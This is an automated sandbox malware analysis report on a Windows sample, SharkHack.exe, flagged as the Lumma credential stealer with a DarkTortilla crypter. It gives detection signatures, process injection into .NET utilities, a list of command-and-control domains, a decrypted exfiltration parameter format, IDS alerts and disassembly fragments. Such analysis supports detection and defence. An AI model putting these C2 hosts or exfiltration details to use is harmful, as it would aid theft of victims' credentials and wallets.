Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SharkHack.exe

Overview

General Information

Sample name:SharkHack.exe
Analysis ID:1582497
MD5:af8f4b24943a56c36283c58af92a66d2
SHA1:97d2342d59a890a5c1645efeb275e3ad4f061f78
SHA256:35bfacbefd16ff1a1b942c068a3509ab21b08b830b30ebf659fe83a6d6c8817c
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to delay execution (extensive OutputDebugStringW loop)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • SharkHack.exe (PID: 6224 cmdline: "C:\Users\user\Desktop\SharkHack.exe" MD5: AF8F4B24943A56C36283C58AF92A66D2)
    • InstallUtil.exe (PID: 1360 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • InstallUtil.exe (PID: 4312 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • InstallUtil.exe (PID: 2476 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • AddInProcess32.exe (PID: 7012 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • InstallUtil.exe (PID: 6744 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • WerFault.exe (PID: 3672 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6744 -s 984 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: LummaC

{"C2 url": ["abruptyopsn.shop", "cloudewahsj.shop", "wholersorie.shop", "nearycrepso.shop", "noisycuttej.shop", "aliveindu.click", "rabidcowse.shop", "framekgirus.shop", "tirepublicerj.shop"], "Build id": "bFcGh6--2912"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2881426397.0000000005E70000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
          00000007.00000002.2915403945.00000000044E3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
            00000000.00000002.2875564569.0000000004C2D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              00000009.00000002.2923724922.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 13 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.SharkHack.exe.5e70000.3.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                  7.2.InstallUtil.exe.44e31f0.0.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                    0.2.SharkHack.exe.5e70000.3.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                      7.2.InstallUtil.exe.44e31f0.0.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                        9.2.InstallUtil.exe.400000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          Click to see the 13 entries

                          Sigma Signatures

                          No Sigma rule has matched

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-30T18:47:00.926245+010020283713Unknown Traffic192.168.2.450013104.21.64.143443TCP
                          2024-12-30T18:47:02.071916+010020283713Unknown Traffic192.168.2.450014104.21.64.143443TCP
                          2024-12-30T18:47:03.207695+010020283713Unknown Traffic192.168.2.450015104.21.64.143443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-30T18:47:01.412207+010020546531A Network Trojan was detected192.168.2.450013104.21.64.143443TCP
                          2024-12-30T18:47:02.547746+010020546531A Network Trojan was detected192.168.2.450014104.21.64.143443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-30T18:47:01.412207+010020498361A Network Trojan was detected192.168.2.450013104.21.64.143443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-30T18:47:02.547746+010020498121A Network Trojan was detected192.168.2.450014104.21.64.143443TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: SharkHack.exeAvira: detected
                          Found malware configuration
                          Source: 10.2.AddInProcess32.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["abruptyopsn.shop", "cloudewahsj.shop", "wholersorie.shop", "nearycrepso.shop", "noisycuttej.shop", "aliveindu.click", "rabidcowse.shop", "framekgirus.shop", "tirepublicerj.shop"], "Build id": "bFcGh6--2912"}
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for sample
                          Source: SharkHack.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 0000000A.00000002.2923783278.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
                          Source: 0000000A.00000002.2923783278.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rabidcowse.shop
                          Source: 0000000A.00000002.2923783278.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: noisycuttej.shop
                          Source: 0000000A.00000002.2923783278.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
                          Source: 0000000A.00000002.2923783278.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: framekgirus.shop
                          Source: 0000000A.00000002.2923783278.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wholersorie.shop
                          Source: 0000000A.00000002.2923783278.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
                          Source: 0000000A.00000002.2923783278.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: nearycrepso.shop
                          Source: 0000000A.00000002.2923783278.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: aliveindu.click
                          Source: 0000000A.00000002.2923783278.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                          Source: 0000000A.00000002.2923783278.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                          Source: 0000000A.00000002.2923783278.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                          Source: 0000000A.00000002.2923783278.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                          Source: 0000000A.00000002.2923783278.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                          Source: 0000000A.00000002.2923783278.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bFcGh6--2912
                          Source: SharkHack.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                          Source: unknownHTTPS traffic detected: 104.21.64.143:443 -> 192.168.2.4:50013 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.64.143:443 -> 192.168.2.4:50014 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.64.143:443 -> 192.168.2.4:50015 version: TLS 1.2
                          Source: SharkHack.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: System.ni.pdbRSDS source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: \??\C:\Windows\InstallUtil.pdbK source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: n.pdbi source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: ((.pdb source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.ni.pdbRSDS source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2929951548.0000000003409000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbl source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.pdb source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdbX source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: til.pdb source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Core.ni.pdb source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb1F source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Core.pdbp source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: mscorlib.pdb source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb V source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.pdbH source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb`[p source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.ni.pdb source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000009.00000002.2929951548.0000000003409000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: System.Core.pdb source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: InstallUtil.pdb\rvr <{ source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: InstallUtil.pdbYYc source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2927056083.0000000001388000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.ni.pdb source: WER11DB.tmp.dmp.13.dr
                          Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdbn=h source: InstallUtil.exe, 00000009.00000002.2927794867.00000000016E2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Core.ni.pdbRSDS source: WER11DB.tmp.dmp.13.dr
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+2397B827h]10_2_0043DCE9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h10_2_0043DCE9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov esi, edx10_2_00408640
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h10_2_0042A050
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+129161F8h]10_2_0043E051
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax-01h]10_2_0043E850
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+217F4C11h]10_2_00426000
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp ecx10_2_0043D818
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 798ECF08h10_2_00419820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h10_2_00419820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]10_2_0043F830
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]10_2_0043F0CB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov byte ptr [edi], dl10_2_0042C0CD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+18h]10_2_00415882
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h10_2_00415882
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h10_2_004398A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4B1BF3DAh10_2_004390A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov byte ptr [edi], dl10_2_0042C140
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [eax+ebx*8], 9EB5184Bh10_2_00416148
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+68h]10_2_00416148
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov byte ptr [esi], al10_2_00416148
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov byte ptr [esi], al10_2_00416148
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov word ptr [edi], cx10_2_0042895A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov ecx, eax10_2_0042895A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx esi, word ptr [eax]10_2_00424974
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h10_2_00424974
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00428100
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h10_2_00440130
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp ecx10_2_004229CD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov word ptr [eax], cx10_2_004229CD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h10_2_0043E19A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov byte ptr [edi], dl10_2_0042C1A3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-27C0856Fh]10_2_0043C1B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]10_2_0043F1B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00427A5A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov word ptr [edi], ax10_2_0041CA60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov word ptr [edi], ax10_2_0041CA60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-19559D57h]10_2_0043E262
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+000011E4h]10_2_00423A60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov byte ptr [edi], al10_2_0042C26C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]10_2_0042C26C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov byte ptr [esi], al10_2_0042BA79
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx-143BF0FEh]10_2_0040C22D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]10_2_0043F2F6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov byte ptr [edi], al10_2_0042C282
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]10_2_0042C282
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-22E2F54Ah]10_2_0043EA80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]10_2_00429A90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00426340
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+217F4C99h]10_2_00426340
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]10_2_00402B60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-00000092h]10_2_00426360
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00426360
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov dword ptr [esp], ecx10_2_00419362
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00427B08
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]10_2_0043F330
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+20h]10_2_004073C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]10_2_004073C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]10_2_0043F3C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx edx, byte ptr [ebx+ecx-5Fh]10_2_0041C3CC
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then push esi10_2_00420BD3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then test eax, eax10_2_004393D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h10_2_0043FB80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov byte ptr [eax], dl10_2_0042238D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp ecx10_2_0042238D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov edx, eax10_2_0043C440
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]10_2_0043F450
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi-4Bh]10_2_00439C70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx ebx, byte ptr [edx]10_2_00435410
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]10_2_00421C80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah10_2_00440480
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]10_2_00416C90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h10_2_004274A5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-000000DCh]10_2_00427CB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00427CB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov esi, ecx10_2_0043C510
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then test eax, eax10_2_0043C510
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h10_2_0043C510
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+5024FCA5h]10_2_00414DC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]10_2_00416C90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+18h]10_2_004155DB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov ecx, eax10_2_0041AD80
